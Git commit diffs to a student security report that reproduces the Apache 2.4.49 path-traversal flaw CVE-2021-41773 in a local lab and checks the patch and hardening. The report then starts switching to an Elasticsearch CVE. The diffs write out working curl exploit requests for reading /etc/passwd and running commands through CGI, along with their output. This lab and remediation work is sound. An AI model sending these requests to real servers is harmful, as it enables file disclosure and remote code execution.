<commit_message>
cve: reproduce CVE-2021-41773 and verify both fix layers
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -3652,6 +3652,66 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Both attacks were executed against the running container on this machine; the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exact status lines, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Server: Apache/2.4.49</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> headers and bodies are stored in</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reports/cve-41773-phase1.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
@@ -4657,14 +4717,18 @@
         <w:br/>
         <w:t>$ curl --path-as-is -i 'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
         <w:br/>
-        <w:t>HTTP/1.1 403 Forbidden</w:t>
+        <w:t>HTTP/1.1 400 Bad Request</w:t>
+        <w:br/>
+        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
         <w:br/>
         <w:t># body contains no root:x:0:0</w:t>
         <w:br/>
         <w:br/>
         <w:t>$ curl --path-as-is -i --data 'echo;id' 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
         <w:br/>
-        <w:t>HTTP/1.1 403 Forbidden</w:t>
+        <w:t>HTTP/1.1 400 Bad Request</w:t>
+        <w:br/>
+        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
         <w:br/>
         <w:t># body contains no uid=</w:t>
       </w:r>
@@ -4697,11 +4761,24 @@
         <w:br/>
         <w:t>HTTP/1.1 200 OK</w:t>
         <w:br/>
-        <w:t>It works!</w:t>
+        <w:t>&lt;html&gt;&lt;body&gt;&lt;h1&gt;It works!&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="23"/>
+        </w:rPr>
+        <w:t>9.1 The three scenarios, measured</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="120"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -4710,21 +4787,560 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Automated verdict (</w:t>
+        <w:t>To show that the patch and the hardening are two *different* controls, the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>vulnerable 2.4.49 binary was also run with its default (secure) configuration,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i.e. the code is still vulnerable but </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
+        <w:t>Require all denied</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>):</w:t>
+        <w:t xml:space="preserve"> and no CGI.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2339"/>
+        <w:gridCol w:w="2339"/>
+        <w:gridCol w:w="2339"/>
+        <w:gridCol w:w="2339"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Scenario (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>Server</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> header)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Traversal → </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>/etc/passwd</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>CGI execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:b/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>GET /</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>2.4.49 + Vulhub config (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>Apache/2.4.49</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>uid=1(daemon) gid=1(daemon)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>2.4.49 + default config (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>Apache/2.4.49</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>403 Forbidden</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>403 Forbidden</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>2.4.51 + hardening (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>Apache/2.4.51</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>400 Bad Request</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>400 Bad Request</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Reading the table:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>row 1 is the vulnerability;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>row 2 is the *configuration* layer alone — the vulnerable code is present,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>the attack still fails, so the fix cannot rely on the version bump being</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>applied correctly everywhere;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>row 3 is the *patch* — the request now dies inside the normaliser (400)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>before authorisation, which is what a genuine code fix looks like. A 403</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>would mean "the router still resolved it and authorisation caught it".</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Automated verdict (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>), one run per phase:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4738,20 +5354,35 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>VERDICT: file disclosure = SUCCESS (vulnerable as expected)</w:t>
+        <w:t>PHASE 1: Apache 2.4.49 + Vulhub config</w:t>
         <w:br/>
-        <w:t>VERDICT: command execution = SUCCESS (vulnerable as expected)</w:t>
+        <w:t>VERDICT: file disclosure = SUCCESS (vulnerable, as expected)</w:t>
+        <w:br/>
+        <w:t>VERDICT: command execution = SUCCESS (vulnerable, as expected)</w:t>
         <w:br/>
         <w:t>Result: PASS - vulnerability reproduced</w:t>
         <w:br/>
         <w:br/>
+        <w:t>PHASE 2: Apache 2.4.49 (still vulnerable code) + default hardening</w:t>
+        <w:br/>
         <w:t>VERDICT: traversal blocked = True</w:t>
         <w:br/>
-        <w:t>VERDICT: RCE blocked = True</w:t>
+        <w:t>VERDICT: command execution blocked = True</w:t>
         <w:br/>
         <w:t>VERDICT: normal functionality intact = True</w:t>
         <w:br/>
         <w:t>Result: PASS - vulnerability eliminated</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>PHASE 3: Apache 2.4.51 + hardening</w:t>
+        <w:br/>
+        <w:t>VERDICT: traversal blocked = True</w:t>
+        <w:br/>
+        <w:t>VERDICT: command execution blocked = True</w:t>
+        <w:br/>
+        <w:t>VERDICT: normal functionality intact = True</w:t>
+        <w:br/>
+        <w:t>Result: PASS - vulnerability eliminated</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4761,10 +5392,104 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Raw transcripts: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>[[SCREENSHOT: fixed environment – both attacks return 403, / still 200]]</w:t>
+        <w:t>reports/cve-41773-all.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reports/cve-41773-phase1.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reports/cve-41773-hardened-config.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reports/cve-41773-phase2.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>[[SCREENSHOT: fixed environment – both attacks return 400, / still 200]]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>[[SCREENSHOT: hardened 2.4.49 – both attacks return 403, / still 200]]</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
docs: use the real repository URL in the report
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -245,7 +245,7 @@
           <w:b w:val="0"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Repository: https://github.com/&lt;user&gt;/work1-secure-api</w:t>
+        <w:t>Repository: https://github.com/mahaotian23320311/work1-secure-api</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -259,7 +259,7 @@
           <w:b w:val="0"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Pipeline:   https://github.com/&lt;user&gt;/work1-secure-api/actions</w:t>
+        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
cve: switch the lab to CVE-2014-3120 (Elasticsearch dynamic scripting RCE)
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -376,14 +376,14 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>CVE-2021-41773</w:t>
+        <w:t>CVE-2014-3120</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in Apache HTTP Server</w:t>
+        <w:t xml:space="preserve"> in Elasticsearch</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -396,7 +396,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>2.4.49 using the Vulhub environment.</w:t>
+        <w:t>1.1.1 using the Vulhub environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2983,7 +2983,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CVE-2021-41773</w:t>
+              <w:t>CVE-2014-3120</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3016,7 +3016,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>Apache HTTP Server 2.4.49</w:t>
+              <w:t>Elasticsearch before 1.2.0</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3049,7 +3049,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CWE-22 – path traversal; CWE-20 – improper input validation</w:t>
+              <w:t>CWE-284 – improper access control (client-supplied code evaluation)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3082,21 +3082,21 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>7.5 HIGH (</w:t>
+              <w:t>8.1 HIGH (</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
+              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>)</w:t>
+              <w:t>; CVSS v2: 6.8)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3129,7 +3129,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>5 October 2021</w:t>
+              <w:t>28 July 2014</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3162,7 +3162,40 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2.4.51 (2.4.50 was an incomplete fix)</w:t>
+              <w:t>1.2.0 (dynamic scripting off by default); sandbox added in 1.4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4677"/>
+          </w:tcPr>
+          <w:p>
